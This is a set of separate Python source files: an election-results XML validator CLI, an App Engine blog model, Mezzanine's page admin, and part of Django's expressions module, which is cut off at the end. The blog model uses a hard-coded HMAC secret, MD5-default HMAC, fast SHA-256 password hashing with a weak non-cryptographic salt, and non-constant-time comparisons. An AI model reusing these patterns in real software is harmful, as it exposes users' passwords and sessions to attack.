  valid_severities = loggers.supported_severities_mapping()
  severity = arg.strip().lower()
  if severity in valid_severities:
    return valid_severities[severity]
  # Unknown severity: report the supported options and exit.
  parser.error("Invalid severity. Options are {0}".format(
      valid_severities.keys()))
# pylint: disable=g-doc-args
# pylint: disable=g-doc-return-or-yield
def _validate_country_codes(parser, arg):
  """Check that the supplied 2 country code is correct.

  The repo is at https://github.com/opencivicdata/ocd-division-ids
  """
  country_code = arg.strip().lower()
  # 'us' is the default country code and will always be valid.
  # This is so we bypass the call to the GitHub API when no -c flag
  if country_code == "us":
    return country_code
  # NOTE(review): network call - lists the identifiers directory of the
  # ocd-division-ids repo to discover which country-<code>.csv files exist.
  github_api = github.Github()
  country_ids = github_api.get_repo(
      "opencivicdata/ocd-division-ids").get_contents("identifiers")
  valid_codes = []
  for content_file in country_ids:
    if content_file.type == "file":
      result = re.search(r"country-([a-z]{2})\.csv", content_file.name)
      if result:
        ocd_id = result.group(1)
        if country_code == ocd_id:
          return country_code
        else:
          valid_codes.append(ocd_id)
  # No match found: parser.error prints the available codes and exits.
  parser.error("Invalid country code. Available codes are: %s" %
               ", ".join(valid_codes))
def arg_parser():
  """Parser for command line arguments."""
  description = ("Script to validate that "
                 "election results XML file(s) "
                 "follow best practices")
  parser = argparse.ArgumentParser(description=description)
  # Two sub-commands: "validate" runs the checks, "list" shows rule details.
  subparsers = parser.add_subparsers(dest="cmd")
  parser_validate = subparsers.add_parser("validate")
  add_validate_parser_args(parser, parser_validate)
  parser_list = subparsers.add_parser("list")
  add_parser_rules_filter_args(parser, parser_list)
  return parser
def add_validate_parser_args(parser, parser_validate):
  """Enriches cmd "validate" parser with all of its arguments."""
  add_validate_parser_input_file_args(parser, parser_validate)
  add_validate_parser_output_args(parser, parser_validate)
  add_validate_parser_ocd_id_args(parser, parser_validate)
  add_parser_rules_filter_args(parser, parser_validate)
  parser_validate.add_argument(
      "--required_languages",
      help="Languages required by the AllLanguages check.",
      required=False)
  parser_validate.add_argument(
      "--profile_report",
      help="Run profiling and print the execution report.",
      required=False)
def add_validate_parser_input_file_args(parser, parser_validate):
  """Enriches cmd "validate" parser with the input file arguments."""
  parser_validate.add_argument(
      "-x",
      "--xsd",
      help="Common Data Format XSD file path",
      required=True,
      metavar="xsd_file",
      type=lambda x: _validate_path(parser, x))
  parser_validate.add_argument(
      "election_files",
      help="XML election files to be validated",
      nargs="+",
      metavar="election_files",
      type=lambda x: _validate_path(parser, x))
def add_validate_parser_output_args(parser, parser_validate):
  """Enriches cmd "validate" parser with output display config."""
  parser_validate.add_argument(
      "--verbose",
      "-v",
      action="store_true",
      help="Print out detailed log messages. Defaults to False",
      required=False)
  parser_validate.add_argument(
      "--severity",
      "-s",
      type=lambda x: _validate_severity(parser, x),
      help="Minimum issue severity level - {0}".format(
          loggers.severities_names()),
      required=False)
def add_validate_parser_ocd_id_args(parser, parser_validate):
  """Enriches cmd "validate" parser with ocdId related arguments."""
  parser_validate.add_argument(
      "--ocdid_file",
      help="Local ocd-id csv file path",
      required=False,
      metavar="csv_file",
      type=lambda x: _validate_path(parser, x))
  parser_validate.add_argument(
      "-c",
      help="Two letter country code for OCD IDs.",
      metavar="country",
      type=lambda x: _validate_country_codes(parser, x),
      required=False,
      default="us")
  parser_validate.add_argument(
      "-g",
      # Fixed: the two adjacent literals previously concatenated to
      # "...on Github.Defaults to True" (missing space).
      help="Skip check to see if there is a new OCD ID file on Github. "
      "Defaults to True",
      action="store_true",
      required=False)
def add_parser_rules_filter_args(parser, cmd_parser):
  """Enriches cmd parser with rules related arguments."""
  cmd_parser.add_argument(
      "-e",
      help="Comma separated list of rules to be excluded.",
      required=False,
      type=lambda x: _validate_rules(parser, x))
  # -i (explicit rule list) and --rule_set are mutually exclusive.
  group = cmd_parser.add_mutually_exclusive_group(required=False)
  group.add_argument(
      "-i",
      help="Comma separated list of rules to be validated.",
      required=False,
      type=lambda x: _validate_rules(parser, x))
  group.add_argument(
      "--rule_set",
      "-r",
      help="Pre-defined rule set: [{}].".format(", ".join(
          s.name.lower() for s in rules.RuleSet)),
      required=False,
      default="election",
      type=ruleset_type)
def ruleset_type(enum_string):
  """Convert a CLI rule-set name into a rules.RuleSet member.

  Raises argparse.ArgumentTypeError for unknown names so argparse can
  report a proper usage error.
  """
  try:
    return rules.RuleSet[enum_string.upper()]
  except KeyError as err:
    msg = "Rule set must be one of [{}]".format(", ".join(
        s.name.lower() for s in rules.RuleSet))
    # Chain the original KeyError so the root cause stays visible.
    raise argparse.ArgumentTypeError(msg) from err
def get_metadata(file):
  """Gets metadata associated with this run of the validator.

  Returns a list of strings: the validator version and the SHA3-256
  checksum of *file*. The file is read in chunks and rewound afterwards.
  """
  chunk_size = 65536
  hasher = hashlib.new("sha3_256")
  for chunk in iter(lambda: file.read(chunk_size), b""):
    hasher.update(chunk)
  metadata = ["Validator version: {}".format(version.__version__)]
  metadata.append("SHA3-256 checksum: 0x{}".format(hasher.hexdigest()))
  # Rewind so callers can read the file again from the start.
  file.seek(0)
  return metadata
def display_rules_details(options):
  """Display rules set details based on user input."""
  print("Selected rules details:")
  selected = filter_all_rules_using_user_arg(
      options.i, options.rule_set, options.e)
  # One line per rule: name plus the first line of its docstring.
  for rule in sorted(selected, key=lambda rule_cls: rule_cls.__name__):
    summary = rule.__doc__.split("\n")[0]
    print("\t{} - {}".format(rule.__name__, summary))
def filter_all_rules_using_user_arg(rules_allowlist, rule_set, rules_blocklist):
  """Extract a sublist from ALL_RULES list using the user input.

  Args:
    rules_allowlist: explicit rule names to check; falsy to use rule_set.
    rule_set: a rules.RuleSet member selecting a pre-defined rule list.
    rules_blocklist: rule names to drop from the selection; may be falsy.

  Returns:
    The classes from rules.ALL_RULES whose names survive the filtering.

  Raises:
    AssertionError: if rule_set is not a recognised RuleSet member.
  """
  if rules_allowlist:
    rule_names = rules_allowlist
  elif rule_set == rules.RuleSet.ELECTION:
    rule_names = [x.__name__ for x in rules.ELECTION_RULES]
  elif rule_set == rules.RuleSet.OFFICEHOLDER:
    rule_names = [x.__name__ for x in rules.OFFICEHOLDER_RULES]
  else:
    # Use format() rather than "+": rule_set is a RuleSet enum member, so
    # concatenating it with a str would raise TypeError and mask the
    # intended AssertionError.
    raise AssertionError("Invalid rule_set: {}".format(rule_set))
  if rules_blocklist:
    rule_names = set(rule_names) - set(rules_blocklist)
  return [x for x in rules.ALL_RULES if x.__name__ in rule_names]
def compute_max_found_severity(exceptions_wrapper):
  """Map the most severe logged exception type to a numeric level.

  Returns 3 for errors, 2 for warnings, 1 for infos and 0 when no
  exception of any of those types was logged.
  """
  severity_by_type = (
      (loggers.ElectionError, 3),
      (loggers.ElectionWarning, 2),
      (loggers.ElectionInfo, 1),
  )
  for exception_type, severity in severity_by_type:
    if exceptions_wrapper.count_logs_with_exception_type(exception_type):
      return severity
  return 0
def exec_profiling(func):
  """Decorator adding optional cProfile reporting around feed validation.

  The wrapped function is profiled only when its single argument carries a
  truthy ``profile_report`` attribute; the cumulative-time stats for frames
  matching "rules" are printed to stdout afterwards.
  """
  def add_profiling_if_needed(args):
    if args is None or not args.profile_report:
      return func(args)
    profiler = cProfile.Profile(builtins=False)
    profiler.enable()
    result = func(args)
    profiler.disable()
    report_buffer = io.StringIO()
    stats = pstats.Stats(profiler, stream=report_buffer)
    stats.strip_dirs().sort_stats("cumulative").print_stats("rules")
    print(report_buffer.getvalue())
    return result
  return add_profiling_if_needed
@exec_profiling
def feed_validation(options):
  """Validate the input feed depending on the user parameters.

  Runs every selected rule against each file in options.election_files and
  returns the highest severity level found across all files
  (0 = clean .. 3 = error), suitable for use as a process exit code.
  """
  rule_options = {}
  # Load the OCD ID list once up front; options.g skips the check for a
  # newer OCD ID file on Github.
  gpunit_rules.GpUnitOcdIdValidator.init_ocd_id_list(options.c,
                                                     options.ocdid_file,
                                                     not options.g)
  if options.required_languages:
    # Forward the comma-separated language list to the AllLanguages rule.
    rule_options.setdefault("AllLanguages", []).append(
        base.RuleOption("required_languages",
                        str.split(options.required_languages, ",")))
  rule_classes_to_check = filter_all_rules_using_user_arg(
      options.i, options.rule_set, options.e)
  # Track the worst severity seen across all validated files.
  errors = 0
  for election_file in options.election_files:
    print("\n--------- Results after validating file: {0} ".format(
        election_file.name))
    for metadatum in get_metadata(election_file):
      print(metadatum)
    registry = base.RulesRegistry(
        election_file=election_file,
        schema_file=options.xsd,
        rule_classes_to_check=rule_classes_to_check,
        rule_options=rule_options)
    registry.check_rules()
    registry.print_exceptions(options.severity, options.verbose)
    if options.verbose:
      registry.count_stats()
    errors = max(errors,
                 compute_max_found_severity(registry.exceptions_wrapper))
  return errors
def main():
  """Entry point: dispatch to rule listing or feed validation.

  Returns:
    None for the "list" command (and for unknown commands), otherwise the
    numeric severity returned by feed_validation (0 = clean .. 3 = error).
  """
  p = arg_parser()
  options = p.parse_args()
  if options.cmd == "list":
    display_rules_details(options)
    return None
  elif options.cmd == "validate":
    options.election_files = [
        open(path, "rb") for path in options.election_files
    ]
    options.xsd = open(options.xsd, "r")
    if options.ocdid_file:
      options.ocdid_file = open(options.ocdid_file, encoding="utf-8")
    # Close every opened handle even when validation raises, so a failing
    # run does not leak file descriptors.
    try:
      return feed_validation(options)
    finally:
      for election_file in options.election_files:
        election_file.close()
      options.xsd.close()
      if options.ocdid_file:
        options.ocdid_file.close()
# Allow running this module directly as a command-line tool.
if __name__ == "__main__":
  main()
| |
import hmac
import hashlib
import random
import string
from google.appengine.ext import ndb
# for hmac on cookies - should be somewhere else
# NOTE(review): a secret hard-coded in source is a security risk; load it
# from configuration or the datastore instead.
SECRET_KEY = "Fdh3nhUsLhy"
def make_secure_val(val):
    """ return "<val>|<mac>" where mac is an HMAC of val under SECRET_KEY """
    # NOTE(review): hmac.new() without digestmod defaults to MD5 on
    # Python 2; kept for cookie compatibility, but SHA-256 would be
    # stronger.
    signature = hmac.new(SECRET_KEY, val).hexdigest()
    return "{}|{}".format(val, signature)
def check_secure_val(secure_val):
    """ return the value embedded in a signed cookie, or None if invalid """
    candidate = secure_val.split("|")[0]
    # Recompute the signature for the embedded value and compare against
    # the full cookie string; falls through (returns None) on mismatch.
    if make_secure_val(candidate) == secure_val:
        return candidate
def make_salt():
    """ return a random 5-letter salt for password hashing """
    # string.letters/xrange are Python 2 only, matching the rest of
    # this App Engine module.
    return "".join(random.choice(string.letters) for _ in xrange(5))
def make_pw_hash(name, pw, salt=None):
    """
    return "<sha256 hex>,<salt>" for the given credentials

    a fresh salt is generated unless one is supplied; passing the stored
    salt lets a caller recreate the hash to verify a password
    """
    if not salt:
        salt = make_salt()
    digest = hashlib.sha256(name + pw + salt).hexdigest()
    return '%s,%s' % (digest, salt)
def valid_pw(name, pw, h):
    """
    return True when hashing name/pw with the salt stored in h matches h

    h has the "<hash>,<salt>" layout produced by make_pw_hash
    """
    stored_salt = h.split(",")[1]
    return make_pw_hash(name, pw, stored_salt) == h
class BlogUser(ndb.Model):
    """
    user who can login, write blog entries and comment/like other people's
    """
    # pwd holds the "<sha256>,<salt>" string produced by make_pw_hash()
    username = ndb.StringProperty(required=True)
    pwd = ndb.StringProperty(required=True)
    email = ndb.StringProperty(required=True)
    created = ndb.DateTimeProperty(auto_now_add=True)
    @classmethod
    def by_id(cls, user_id):
        """ class method to return a user, if found, by ID """
        return cls.get_by_id(user_id)
    @classmethod
    def login(cls, username=None, password=None):
        """
        Check that the username and password is valid
        if so, return the User entity
        """
        # look up the username
        user_list = cls.query(cls.username == username).fetch(1)
        # check if user exists and password is valid against it's hash
        if user_list and valid_pw(username, password, user_list[0].pwd):
            return user_list[0]
        else:
            return None
    @classmethod
    def signup(cls, username=None, password=None, email=None):
        """
        method to register a new user
        assuming the user doesn't already exist

        NOTE: returns the new entity's ndb.Key (the result of put()),
        or None when the username is already taken
        """
        user = None
        # test if the username already exists
        user_list = cls.query(cls.username == username).fetch(1)
        if not user_list:
            # signup user if username does not exist create hashed password
            user = BlogUser(username=username,
                            pwd=make_pw_hash(username, password),
                            email=email).put()
        return user
class BlogComment(ndb.Model):
    """ blog comment for structured property as part of BlogPost """
    # username is copied from the commenting BlogUser when the comment is
    # created (see BlogPost.add_comment), alongside the user's key
    userkey = ndb.KeyProperty(kind=BlogUser, required=True)
    username = ndb.StringProperty(required=True)
    comment = ndb.TextProperty(required=True)
    created = ndb.DateTimeProperty(auto_now_add=True)
    updated = ndb.DateTimeProperty(auto_now=True)
class BlogPost(ndb.Model):
    """ Entity to store the blog entries made by owners """
    username = ndb.StringProperty(required=True)
    userkey = ndb.KeyProperty(kind=BlogUser, required=True)
    subject = ndb.StringProperty(required=True)
    blog = ndb.TextProperty(required=True)
    created = ndb.DateTimeProperty(auto_now_add=True)
    updated = ndb.DateTimeProperty(auto_now=True)
    likes = ndb.IntegerProperty()
    dislikes = ndb.IntegerProperty()
    comments = ndb.StructuredProperty(BlogComment, repeated=True)

    @classmethod
    def get_blogs(cls, n=1):
        """ return the top n blogs ordered by most recent update date """
        return cls.query().order(-cls.updated).fetch(n)

    @classmethod
    def by_id(cls, blog_id):
        """ return a specific blog entity by passing a blog id """
        return cls.get_by_id(blog_id)

    @classmethod
    def new_post(cls, user=None, subject="", posting=""):
        """ create a new post for user and return the new entity's key """
        post = cls(username=user.username, userkey=user.key, subject=subject,
                   blog=posting, likes=0, dislikes=0, comments=[])
        return post.put()

    @classmethod
    def save_comment(cls, user=None, blog=None, comment_id=None,
                     comment=None):
        """ replace the comment at index comment_id with the new text

        returns the blog key on success, False for an invalid comment_id
        """
        try:
            # the id arrives from the request as a string; without this
            # conversion the index comparison below could never match and
            # the edit would be silently dropped
            comment_id = int(comment_id)
        except (TypeError, ValueError):
            return False
        new_comment = BlogComment(userkey=user.key,
                                  username=user.username, comment=comment)
        # comments is a repeated StructuredProperty, so assign a fresh list
        # with the edited entry swapped in rather than mutating in place
        blog.comments = [
            new_comment if index == comment_id else item
            for index, item in enumerate(blog.comments)
        ]
        return blog.put()

    # class method to delete a comment
    @classmethod
    def delete_comment(cls, blog=None, comment_id=None):
        """ remove the comment at index comment_id from the blog """
        try:
            # is the comment id valid (it arrives as a string)
            comment_id = int(comment_id)
        except (TypeError, ValueError):
            return False
        blog.comments = [item for index, item in enumerate(blog.comments)
                         if index != comment_id]
        return blog.put()

    # class method to add a comment
    @classmethod
    def add_comment(cls, user=None, blog=None, comment=None):
        """
        append a new comment to the blog and save it
        """
        blog_comment = BlogComment(userkey=user.key,
                                   username=user.username,
                                   comment=comment)
        # the repeated property may be empty/unset on older entities
        if blog.comments:
            blog.comments.append(blog_comment)
        else:
            blog.comments = [blog_comment]
        return blog.put()

    @classmethod
    def edit_blog(cls, blog=None, subject=None, posting=None):
        """ save an edited subject/body; return the blog key or False """
        blog.subject = subject
        blog.blog = posting
        try:
            return blog.put()
        # except Exception rather than a bare except, so SystemExit and
        # KeyboardInterrupt are not swallowed
        except Exception:
            return False

    @classmethod
    def delete_blog(cls, blog=None):
        """ deletion process for a blog """
        try:
            # the blog is owned by the user so can delete
            blog.key.delete()
            return True
        except Exception:
            return False

    @classmethod
    def like_blog(cls, user=None, blog=None, like_action=None):
        """ either like or dislike the blog and update the counts """
        try:
            vote = BlogLike(userkey=user.key, blogkey=blog.key,
                            like=bool(like_action)).put()
            if vote:
                if like_action:
                    blog.likes += 1
                else:
                    blog.dislikes += 1
                blog.put()
            return True
        except Exception:
            return False
class BlogLike(ndb.Model):
    """ referenced entity to manage like / dislike of blog post """
    # like=True records a like, False a dislike, for the given user/blog pair
    userkey = ndb.KeyProperty(kind=BlogUser, required=True)
    blogkey = ndb.KeyProperty(kind=BlogPost, required=True)
    like = ndb.BooleanProperty(required=True)
    created = ndb.DateTimeProperty(auto_now_add=True)
    @classmethod
    def like_exists(cls, user=None, blog=None):
        """ return a match if a user has liked/disliked a blog """
        # fetch(1) yields a list with at most one entity; callers rely on
        # its truthiness
        return cls.query(cls.blogkey == blog.key,
                         cls.userkey == user.key).fetch(1)
| |
from __future__ import unicode_literals
from copy import deepcopy
from django.contrib import admin
from django.core.exceptions import PermissionDenied
from django.core.urlresolvers import NoReverseMatch
from django.http import HttpResponseRedirect
from django.shortcuts import get_object_or_404
from mezzanine.conf import settings
from mezzanine.core.admin import DisplayableAdmin, DisplayableAdminForm
from mezzanine.pages.models import Page, RichTextPage, Link
from mezzanine.utils.urls import admin_url
# Add extra fields for pages to the Displayable fields.
# We only add the menu field if PAGE_MENU_TEMPLATES has values.
page_fieldsets = deepcopy(DisplayableAdmin.fieldsets)
if settings.PAGE_MENU_TEMPLATES:
    page_fieldsets[0][1]["fields"] += ("in_menus",)
# Pages can always be restricted to logged-in users.
page_fieldsets[0][1]["fields"] += ("login_required",)
class PageAdminForm(DisplayableAdminForm):

    def clean_slug(self):
        """
        Stash the pre-edit slug on the instance so that
        PageAdmin.save_model() can propagate a slug change down the
        page tree.
        """
        instance = self.instance
        instance._old_slug = instance.slug
        return self.cleaned_data["slug"]
class PageAdmin(DisplayableAdmin):
    """
    Admin class for the ``Page`` model and all subclasses of
    ``Page``. Handles redirections between admin interfaces for the
    ``Page`` model and its subclasses.
    """
    form = PageAdminForm
    fieldsets = page_fieldsets
    change_list_template = "admin/pages/page/change_list.html"
    def __init__(self, *args, **kwargs):
        """
        For ``Page`` subclasses that are registered with an Admin class
        that doesn't implement fieldsets, add any extra model fields
        to this instance's fieldsets. This mimics Django's behaviour of
        adding all model fields when no fieldsets are defined on the
        Admin class.
        """
        super(PageAdmin, self).__init__(*args, **kwargs)
        # Test that the fieldsets don't differ from PageAdmin's.
        if self.model is not Page and self.fieldsets == PageAdmin.fieldsets:
            # Make a copy so that we aren't modifying other Admin
            # classes' fieldsets.
            self.fieldsets = deepcopy(self.fieldsets)
            # Insert each field between the publishing fields and nav
            # fields. Do so in reverse order to retain the order of
            # the model's fields.
            exclude_fields = Page._meta.get_all_field_names() + ["page_ptr"]
            # self.exclude or self.form.Meta.exclude may be missing or
            # None, hence the broad except clauses below.
            try:
                exclude_fields.extend(self.exclude)
            except (AttributeError, TypeError):
                pass
            try:
                exclude_fields.extend(self.form.Meta.exclude)
            except (AttributeError, TypeError):
                pass
            fields = self.model._meta.fields + self.model._meta.many_to_many
            for field in reversed(fields):
                if field.name not in exclude_fields and field.editable:
                    self.fieldsets[0][1]["fields"].insert(3, field.name)
    def in_menu(self):
        """
        Hide subclasses from the admin menu.
        """
        return self.model is Page
    def _check_permission(self, request, page, permission):
        """
        Runs the custom permission check and raises an
        exception if False.
        """
        # Dispatches to page.can_add/can_change/can_delete depending on
        # the ``permission`` string.
        if not getattr(page, "can_" + permission)(request):
            raise PermissionDenied
    def add_view(self, request, **kwargs):
        """
        For the ``Page`` model, redirect to the add view for the
        first page model, based on the ``ADD_PAGE_ORDER`` setting.
        """
        if self.model is Page:
            return HttpResponseRedirect(self.get_content_models()[0].add_url)
        return super(PageAdmin, self).add_view(request, **kwargs)
    def change_view(self, request, object_id, **kwargs):
        """
        For the ``Page`` model, check ``page.get_content_model()``
        for a subclass and redirect to its admin change view.
        Also enforce custom change permissions for the page instance.
        """
        page = get_object_or_404(Page, pk=object_id)
        content_model = page.get_content_model()
        self._check_permission(request, content_model, "change")
        if self.model is Page:
            if content_model is not None:
                change_url = admin_url(content_model.__class__, "change",
                                       content_model.id)
                return HttpResponseRedirect(change_url)
        kwargs.setdefault("extra_context", {})
        kwargs["extra_context"].update({
            "hide_delete_link": not content_model.can_delete(request),
            "hide_slug_field": content_model.overridden(),
        })
        return super(PageAdmin, self).change_view(request, object_id, **kwargs)
    def delete_view(self, request, object_id, **kwargs):
        """
        Enforce custom delete permissions for the page instance.
        """
        page = get_object_or_404(Page, pk=object_id)
        content_model = page.get_content_model()
        self._check_permission(request, content_model, "delete")
        return super(PageAdmin, self).delete_view(request, object_id, **kwargs)
    def changelist_view(self, request, extra_context=None):
        """
        Redirect to the ``Page`` changelist view for ``Page``
        subclasses.
        """
        if self.model is not Page:
            return HttpResponseRedirect(admin_url(Page, "changelist"))
        if not extra_context:
            extra_context = {}
        extra_context["page_models"] = self.get_content_models()
        return super(PageAdmin, self).changelist_view(request, extra_context)
    def save_model(self, request, obj, form, change):
        """
        Set the ID of the parent page if passed in via querystring, and
        make sure the new slug propagates to all descendant pages.
        """
        if change and obj._old_slug != obj.slug:
            # _old_slug was set in PageAdminForm.clean_slug().
            new_slug = obj.slug or obj.generate_unique_slug()
            obj.slug = obj._old_slug
            obj.set_slug(new_slug)
        # Force parent to be saved to trigger handling of ordering and slugs.
        parent = request.GET.get("parent")
        if parent is not None and not change:
            obj.parent_id = parent
            obj.save()
        super(PageAdmin, self).save_model(request, obj, form, change)
    def _maintain_parent(self, request, response):
        """
        Maintain the parent ID in the querystring for response_add and
        response_change.
        """
        # NOTE(review): reaches into the private ``_headers`` mapping,
        # where each value is a (name, value) tuple - hence location[1].
        location = response._headers.get("location")
        parent = request.GET.get("parent")
        if parent and location and "?" not in location[1]:
            url = "%s?parent=%s" % (location[1], parent)
            return HttpResponseRedirect(url)
        return response
    def response_add(self, request, obj):
        """
        Enforce page permissions and maintain the parent ID in the
        querystring.
        """
        response = super(PageAdmin, self).response_add(request, obj)
        return self._maintain_parent(request, response)
    def response_change(self, request, obj):
        """
        Enforce page permissions and maintain the parent ID in the
        querystring.
        """
        response = super(PageAdmin, self).response_change(request, obj)
        return self._maintain_parent(request, response)
    @classmethod
    def get_content_models(cls):
        """
        Return all Page subclasses that are admin registered, ordered
        based on the ``ADD_PAGE_ORDER`` setting.
        """
        models = []
        for model in Page.get_content_models():
            try:
                admin_url(model, "add")
            except NoReverseMatch:
                # Not registered with the admin site - leave it out.
                continue
            else:
                setattr(model, "meta_verbose_name", model._meta.verbose_name)
                setattr(model, "add_url", admin_url(model, "add"))
                models.append(model)
        order = [name.lower() for name in settings.ADD_PAGE_ORDER]
        def sort_key(page):
            name = "%s.%s" % (page._meta.app_label, page._meta.object_name)
            unordered = len(order)
            try:
                return (order.index(name.lower()), "")
            except ValueError:
                # Models not listed in ADD_PAGE_ORDER sort after the
                # listed ones, alphabetically by verbose name.
                return (unordered, page.meta_verbose_name)
        return sorted(models, key=sort_key)
# Drop the meta data fields, and move slug towards the top.
link_fieldsets = deepcopy(page_fieldsets[:1])
link_fieldsets[0][1]["fields"] = link_fieldsets[0][1]["fields"][:-1]
link_fieldsets[0][1]["fields"].insert(1, "slug")
class LinkAdmin(PageAdmin):

    fieldsets = link_fieldsets

    def formfield_for_dbfield(self, db_field, **kwargs):
        """
        Make slug mandatory.
        """
        if db_field.name == "slug":
            kwargs = dict(kwargs, required=True)
        return super(LinkAdmin, self).formfield_for_dbfield(db_field, **kwargs)

    def save_form(self, request, form, change):
        """
        Don't show links in the sitemap.
        """
        obj = form.save(commit=False)
        is_new = not obj.id
        if is_new and "in_sitemap" not in form.fields:
            obj.in_sitemap = False
        return super(LinkAdmin, self).save_form(request, form, change)
# Register Page itself and the bundled content types with the admin site.
admin.site.register(Page, PageAdmin)
admin.site.register(RichTextPage, PageAdmin)
admin.site.register(Link, LinkAdmin)
| |
import copy
import datetime
from django.conf import settings
from django.core.exceptions import FieldError
from django.db.backends import utils as backend_utils
from django.db.models import fields
from django.db.models.constants import LOOKUP_SEP
from django.db.models.query_utils import Q, refs_aggregate
from django.utils import six, timezone
from django.utils.functional import cached_property
class Combinable(object):
    """
    Provides the ability to combine one or two objects with
    some connector. For example F('foo') + F('bar').
    """
    # Arithmetic connectors
    ADD = '+'
    SUB = '-'
    MUL = '*'
    DIV = '/'
    POW = '^'
    # The following is a quoted % operator - it is quoted because it can be
    # used in strings that also have parameter substitution.
    MOD = '%%'
    # Bitwise operators - note that these are generated by .bitand()
    # and .bitor(), the '&' and '|' are reserved for boolean operator
    # usage.
    BITAND = '&'
    BITOR = '|'
    def _combine(self, other, connector, reversed, node=None):
        # Wrap plain Python values so that both operands are expressions;
        # timedeltas get a DurationValue so duration arithmetic works.
        if not hasattr(other, 'resolve_expression'):
            # everything must be resolvable to an expression
            if isinstance(other, datetime.timedelta):
                other = DurationValue(other, output_field=fields.DurationField())
            else:
                other = Value(other)
        # ``reversed`` is True for the __r*__ operators, where ``self`` is
        # the right-hand operand.
        if reversed:
            return CombinedExpression(other, connector, self)
        return CombinedExpression(self, connector, other)
    #############
    # OPERATORS #
    #############
    def __add__(self, other):
        return self._combine(other, self.ADD, False)
    def __sub__(self, other):
        return self._combine(other, self.SUB, False)
    def __mul__(self, other):
        return self._combine(other, self.MUL, False)
    def __truediv__(self, other):
        return self._combine(other, self.DIV, False)
    def __div__(self, other):  # Python 2 compatibility
        return type(self).__truediv__(self, other)
    def __mod__(self, other):
        return self._combine(other, self.MOD, False)
    def __pow__(self, other):
        return self._combine(other, self.POW, False)
    def __and__(self, other):
        raise NotImplementedError(
            "Use .bitand() and .bitor() for bitwise logical operations."
        )
    def bitand(self, other):
        return self._combine(other, self.BITAND, False)
    def __or__(self, other):
        raise NotImplementedError(
            "Use .bitand() and .bitor() for bitwise logical operations."
        )
    def bitor(self, other):
        return self._combine(other, self.BITOR, False)
    def __radd__(self, other):
        return self._combine(other, self.ADD, True)
    def __rsub__(self, other):
        return self._combine(other, self.SUB, True)
    def __rmul__(self, other):
        return self._combine(other, self.MUL, True)
    def __rtruediv__(self, other):
        return self._combine(other, self.DIV, True)
    def __rdiv__(self, other):  # Python 2 compatibility
        return type(self).__rtruediv__(self, other)
    def __rmod__(self, other):
        return self._combine(other, self.MOD, True)
    def __rpow__(self, other):
        return self._combine(other, self.POW, True)
    def __rand__(self, other):
        raise NotImplementedError(
            "Use .bitand() and .bitor() for bitwise logical operations."
        )
    def __ror__(self, other):
        raise NotImplementedError(
            "Use .bitand() and .bitor() for bitwise logical operations."
        )
class BaseExpression(object):
    """
    Base class for all query expressions.
    """
    # aggregate specific fields
    is_summary = False
    def __init__(self, output_field=None):
        # The caller-supplied output field, or None to infer it lazily
        # from the source expressions (see _resolve_output_field()).
        self._output_field = output_field
    def get_db_converters(self, connection):
        # Our own converter runs first, then the output field's converters.
        return [self.convert_value] + self.output_field.get_db_converters(connection)
    def get_source_expressions(self):
        # Leaf expressions have no children; container subclasses override
        # this together with set_source_expressions().
        return []
    def set_source_expressions(self, exprs):
        assert len(exprs) == 0
    def _parse_expressions(self, *expressions):
        # Strings become F() column references, other non-expression
        # values become Value() literals.
        return [
            arg if hasattr(arg, 'resolve_expression') else (
                F(arg) if isinstance(arg, six.string_types) else Value(arg)
            ) for arg in expressions
        ]
    def as_sql(self, compiler, connection):
        """
        Responsible for returning a (sql, [params]) tuple to be included
        in the current query.
        Different backends can provide their own implementation, by
        providing an `as_{vendor}` method and patching the Expression:
        ```
        def override_as_sql(self, compiler, connection):
            # custom logic
            return super(Expression, self).as_sql(compiler, connection)
        setattr(Expression, 'as_' + connection.vendor, override_as_sql)
        ```
        Arguments:
         * compiler: the query compiler responsible for generating the query.
           Must have a compile method, returning a (sql, [params]) tuple.
           Calling compiler(value) will return a quoted `value`.
         * connection: the database connection used for the current query.
        Returns: (sql, params)
          Where `sql` is a string containing ordered sql parameters to be
          replaced with the elements of the list `params`.
        """
        raise NotImplementedError("Subclasses must implement as_sql()")
    @cached_property
    def contains_aggregate(self):
        # True when any subexpression, recursively, is an aggregate.
        for expr in self.get_source_expressions():
            if expr and expr.contains_aggregate:
                return True
        return False
    @cached_property
    def contains_column_references(self):
        for expr in self.get_source_expressions():
            if expr and expr.contains_column_references:
                return True
        return False
    def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
        """
        Provides the chance to do any preprocessing or validation before being
        added to the query.
        Arguments:
         * query: the backend query implementation
         * allow_joins: boolean allowing or denying use of joins
           in this query
         * reuse: a set of reusable joins for multijoins
         * summarize: a terminal aggregate clause
         * for_save: whether this expression about to be used in a save or update
        Returns: an Expression to be added to the query.
        """
        c = self.copy()
        c.is_summary = summarize
        c.set_source_expressions([
            expr.resolve_expression(query, allow_joins, reuse, summarize)
            for expr in c.get_source_expressions()
        ])
        return c
    def _prepare(self):
        """
        Hook used by Field.get_prep_lookup() to do custom preparation.
        """
        return self
    @property
    def field(self):
        # Convenience alias for output_field.
        return self.output_field
    @cached_property
    def output_field(self):
        """
        Returns the output type of this expressions.
        """
        if self._output_field_or_none is None:
            raise FieldError("Cannot resolve expression type, unknown output_field")
        return self._output_field_or_none
    @cached_property
    def _output_field_or_none(self):
        """
        Returns the output field of this expression, or None if no output type
        can be resolved. Note that the 'output_field' property will raise
        FieldError if no type can be resolved, but this attribute allows for
        None values.
        """
        if self._output_field is None:
            self._resolve_output_field()
        return self._output_field
    def _resolve_output_field(self):
        """
        Attempts to infer the output type of the expression. If the output
        fields of all source fields match then we can simply infer the same
        type here. This isn't always correct, but it makes sense most of the
        time.
        Consider the difference between `2 + 2` and `2 / 3`. Inferring
        the type here is a convenience for the common case. The user should
        supply their own output_field with more complex computations.
        If a source does not have an `_output_field` then we exclude it from
        this check. If all sources are `None`, then an error will be thrown
        higher up the stack in the `output_field` property.
        """
        if self._output_field is None:
            sources = self.get_source_fields()
            num_sources = len(sources)
            if num_sources == 0:
                self._output_field = None
            else:
                for source in sources:
                    if self._output_field is None:
                        self._output_field = source
                    if source is not None and not isinstance(self._output_field, source.__class__):
                        raise FieldError(
                            "Expression contains mixed types. You must set output_field")
    def convert_value(self, value, expression, connection, context):
        """
        Expressions provide their own converters because users have the option
        of manually specifying the output_field which may be a different type
        from the one the database returns.
        """
        field = self.output_field
        internal_type = field.get_internal_type()
        if value is None:
            return value
        elif internal_type == 'FloatField':
            return float(value)
        elif internal_type.endswith('IntegerField'):
            return int(value)
        elif internal_type == 'DecimalField':
            return backend_utils.typecast_decimal(value)
        return value
    def get_lookup(self, lookup):
